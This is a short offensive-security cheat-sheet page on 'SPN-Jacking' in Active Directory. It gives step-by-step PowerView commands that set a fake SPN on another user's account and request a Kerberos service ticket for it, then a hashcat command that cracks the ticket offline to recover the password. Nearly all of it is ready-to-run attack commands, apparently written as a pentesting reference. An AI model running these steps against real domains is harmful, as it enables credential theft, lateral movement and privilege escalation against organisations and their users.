SPN-Jacking
Last modified: 2024-10-13
If the current user has the right to write another user's SPN (the servicePrincipalName attribute), we can set an SPN on that account, request a service ticket for it and crack the ticket offline to recover the account's password, which can give lateral movement or privilege escalation.
Exploit
1. Set SPN and Get the Hash of the Service Ticket
# 1. Import the PowerView module
. .\PowerView.ps1
# 2. Set an SPN on the target user (requires write access to servicePrincipalName)
Set-DomainObject -Identity <OTHER_USER> -Set @{serviceprincipalname='evil/evil'}
# 3. Request a service ticket for that SPN (returns the hash in a crackable format)
Get-DomainSPNTicket -SPN evil/evil
2. Crack the Hash
The previous step returns the ticket hash; save it to a file and crack it on your local machine:
# -m 13100 is Kerberos 5 TGS-REP etype 23 (RC4). Replace it with the mode matching the ticket's encryption type.
hashcat -a 0 -m 13100 hash.txt wordlist.txt